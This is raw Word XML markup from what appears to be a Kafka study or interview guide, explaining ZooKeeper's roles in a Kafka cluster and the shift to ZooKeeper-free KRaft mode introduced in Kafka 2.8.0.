      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1D036A" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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ZooKeeper keeps track of the metadata of the Kafka cluster, including the list of brokers, partitions, and topics. It ensures that all Kafka brokers are aware of each other's existence and can share cluster-related information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2718DEAA" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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eader Election for Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0022DB7B" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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uses ZooKeeper for leader election among Kafka brokers. For each partition, there is one leader broker and multiple follower brokers. When a partition leader fails, ZooKeeper helps elect a new leader from the available replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544AA83E" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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roker Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2532F5" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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brokers register themselves with ZooKeeper when they start, so that other brokers can discover them and work with them. This is important for maintaining a cluster of Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6120C076" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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figuration Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40845871" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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ZooKeeper stores important configuration information for the Kafka cluster. This includes topic configurations, partition assignments, and replication factors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041BE45" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D2106" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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ZooKeeper helps manage the health of the Kafka cluster. If a broker or a leader partition fails, ZooKeeper can coordinate failover procedures and notify the other brokers, ensuring minimal disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F58D9B8" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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istributed Coordination</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA528F4" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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relies on ZooKeeper for coordination of distributed processes, like handling consumer group offsets and partition reassignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012112EE" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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Can Kafka Work Without ZooKeeper?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFD25B" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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Starting with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka 2.8.0</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is possible to run Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This feature is part of Kafka’s transition toward removing ZooKeeper dependency. Kafka is moving towards a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KRaft (Kafka Raft)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode, where Kafka brokers themselves take over the roles that ZooKeeper traditionally handled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195D91B" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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ey Changes in KRaft Mode (Kafka Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB6C357" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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etadata Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70B4FA" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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In KRaft mode, Kafka brokers themselves manage metadata without relying on ZooKeeper. This is achieved through a new quorum-based consensus mechanism based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Raft protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DBA286" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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eader Election</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F6E85D" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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brokers using KRaft will manage leader election internally using the Raft protocol, rather than using ZooKeeper to elect partition leaders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D1105" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C2F9D4" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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itself will handle partition leader election and failure recovery, making it more self-contained and eliminating the need for an external coordination service like ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F73486" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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implified Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A6D1D7" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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ithout ZooKeeper, Kafka’s architecture becomes simpler, and there is no need to manage a separate ZooKeeper ensemble, which reduces operational complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECD2B27" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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Advantages of Kafka Without ZooKeeper (KRaft Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD4F5B" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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implified Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminates the overhead of running and maintaining a ZooKeeper ensemble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA4E3F" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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mproved Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reduces the risk of coordination failures between ZooKeeper and Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F887DA" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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ower Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Internal management of metadata can potentially reduce latency when compared to ZooKeeper-based coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31807C2E" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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Limitations and Current Status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928BD37" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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Transition Phase</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: As of now, KRaft mode is still under development and is not yet fully mature or recommended for large-scale production environments in all cases. However, Kafka 2.8.0 and later versions support </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ZooKeeper-less</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation in a more experimental mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEFABEB" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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mpatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: KRaft mode requires Kafka clusters to be set up without ZooKeeper, which may not be compatible with existing versions that depend on ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A30E0A" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00BB4FC5">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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E9443" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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ZooKeeper’s Role</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Traditionally, ZooKeeper has been a critical component of Kafka, managing metadata, partition leadership, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586AA747" w14:textId="77777777" w:rsidR="00BB4FC5" w:rsidRPr="0003272F" w:rsidRDefault="00BB4FC5" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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afka Without ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: With the introduction of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KRaft mode</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka 2.8.0, Kafka can now operate without ZooKeeper, using the Raft consensus protocol for metadata management and leader election, making the architecture simpler and more efficient. However, this feature is still evolving and may not yet be suitable for all production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF7493" w14:textId="12E756FA"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="7C184BD3">
          <v:rect id="_x0000_i3180" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C18058B" w14:textId="4C9D2E60" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00246E17" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="797" w:name="_Toc196308277"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the role of ZooKeeper in Kafka, its responsibility for managing broker metadata, and the current move towards KRaft (Kafka Raft) mode that removes the dependency on ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="797"/>
    </w:p>
    <w:p w14:paraId="0706337D" w14:textId="45FDCA54" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="001861D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Role of ZooKeeper in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F201BA" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="007D0932">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ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has traditionally played a vital role in managing and coordinating Kafka clusters, serving as the centralized service for configuration management, leader election, and synchronization between Kafka brokers. Kafka brokers rely on ZooKeeper to maintain the cluster’s state and metadata. Below are the key responsibilities of ZooKeeper in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463902B4" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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luster Metadata Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14298DD5" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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ZooKeeper is responsible for maintaining the metadata of the Kafka cluster, including topics, partitions, brokers, and their configurations. It ensures that all Kafka brokers in the cluster have a consistent view of this information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1932E113" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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eader Election</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF14E53" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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ZooKeeper handles the leader election for partitions in Kafka. Each partition in Kafka has a leader and one or more followers. If the leader for a partition fails, ZooKeeper ensures that a new leader is elected from the replica brokers. This mechanism guarantees fault tolerance and high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7756975F" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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roker Coordination and Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA13D1" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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brokers register themselves with ZooKeeper when they start. ZooKeeper maintains the list of active brokers, and this information is used for inter-broker communication and coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D71FF4" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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Fault Tolerance and Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1A41E" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="144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ZooKeeper helps Kafka recover from broker failures. If a broker fails or a partition leader is lost, ZooKeeper facilitates recovery by helping the cluster elect a new leader and reassign partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31C986" w14:textId="77777777" w:rsidR="007D0932" w:rsidRPr="0003272F" w:rsidRDefault="007D0932" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144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Group Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
